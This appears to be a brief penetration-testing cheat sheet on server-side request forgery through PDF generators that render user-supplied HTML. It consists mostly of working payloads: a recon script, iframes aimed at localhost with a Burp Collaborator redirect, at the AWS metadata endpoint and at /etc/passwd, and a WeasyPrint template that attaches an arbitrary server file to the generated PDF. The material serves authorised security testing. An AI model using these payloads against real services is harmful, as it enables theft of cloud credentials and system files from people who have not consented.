Testing for SSRF during PDF Generation
How to test for SSRF during PDF Generation?
User input is reflected in the PDF.
HTML elements are parsed by the PDF Generator Libraries.
Research the specific types of data that can be parsed by the target's PDF Generator Library in order to generate a payload
Payloads
If HTML is parsed directly:
Recon
<script>
document.write(window.location.href);
document.write(window.location.hostname);
document.write(window.location.pathname);
document.write(window.location.protocol);
document.write(window.location.host);
document.write(window.location.port);
</script>Redirect with iframe
<iframe+src="http://localhost/?redirect=http://xxxx.burpcollaborator.net/x.png">AWS
<iframe src="http://169.254.169.254/user-data">Files
<iframe src="file:///etc/passwd">WeasyPrint PDF Test
Trying to embed a secret file in the PDF? You can try this payload if the target is parsing a HTML page. One thing that you can do is host the index html file in Heroku etc. and pass it to the target's PDF generation endpoint.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>WeasyPrint PDF Test</title>
<link rel=attachment href="file:///{path_to_secret_file}">
</head>
<body>
<h1>WeasyPrint PDF Test</h1>
</body>
</html>In the PDF reader, open up the Attachment section and view the embedded file.
Member discussion